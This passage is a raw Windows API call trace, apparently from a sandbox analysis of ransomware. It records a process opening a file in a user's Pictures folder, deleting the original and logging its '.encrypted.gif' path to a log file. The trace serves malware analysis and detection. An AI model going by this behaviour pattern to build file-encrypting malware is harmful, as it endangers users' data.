(in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0040.050] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.050] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.050] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.050] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.050] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.050] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.050] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.050] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.050] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.050] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.050] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.050] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.050] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.051] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.051] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.051] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.051] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0040.051] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.051] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\uruf9ajfh14ze.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0040.051] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.051] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.051] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.051] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.051] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0040.051] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.052] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.052] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.052] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.052] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.052] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.052] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.052] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.052] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0040.052] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.052] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.052] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.053] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.053] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.053] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.053] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.053] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif", lpFilePart=0x0) returned 0x68 [0040.053] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadd4fc30, ftCreationTime.dwHighDateTime=0x1d5bef1, ftLastAccessTime.dwLowDateTime=0x2ece4750, ftLastAccessTime.dwHighDateTime=0x1d5bbab, ftLastWriteTime.dwLowDateTime=0x1795cf80, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xfbf7, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="Uruf9aJfh14ZE.gif", cAlternateFileName="URUF9A~1.GIF")) returned 0x7c2100 [0040.053] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\uruf9ajfh14ze.gif")) returned 1 [0040.054] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadd4fc30, ftCreationTime.dwHighDateTime=0x1d5bef1, ftLastAccessTime.dwLowDateTime=0x2ece4750, ftLastAccessTime.dwHighDateTime=0x1d5bbab, ftLastWriteTime.dwLowDateTime=0x1795cf80, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xfbf7, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="Uruf9aJfh14ZE.gif", cAlternateFileName="URUF9A~1.GIF")) returned 0 [0040.055] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0040.055] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.056] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0040.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0040.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0040.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0040.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0040.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0040.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0040.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0040.057] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0040.057] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0040.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.057] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.057] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.057] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.057] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.057] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0040.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.057] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0040.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0040.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0040.057] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0040.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0040.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0040.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0040.057] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0040.058] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0040.058] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.058] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0040.058] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.058] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0040.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0040.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0040.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.059] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0040.059] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2c09, lpOverlapped=0x0) returned 1 [0040.060] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0040.060] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x2c09, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.060] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0040.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0040.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0040.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0040.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.encrypted.gif\r\n", cchWideChar=117, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 117 [0040.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x75) returned 0x7800d0 [0040.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.encrypted.gif\r\n", cchWideChar=117, lpMultiByteStr=0x7800d0, cbMultiByte=117, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.encrypted.gif\r\n", lpUsedDefaultChar=0x0) returned 117 [0040.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0040.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0040.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7800d0 | out: hHeap=0x770000) returned 1 [0040.060] WriteFile (in: hFile=0x140, lpBuffer=0x7d5bb8*, nNumberOfBytesToWrite=0x74, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7d5bb8*, lpNumberOfBytesWritten=0x6aee3c*=0x74, lpOverlapped=0x0) returned 1 [0040.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0040.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.060] CloseHandle (hObject=0x140) returned 1 [0040.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0040.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0040.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0040.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0040.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0040.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0040.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0040.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0040.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0040.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0040.062] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0040.062] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0028 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0040.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0040.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0040.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0040.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0040.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0040.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0040.064] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0040.064] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.064] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0040.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0040.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0040.064] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0040.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0040.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0040.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4c8 [0040.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0040.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0040.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0040.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0040.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0040.064] HeapFree (in: 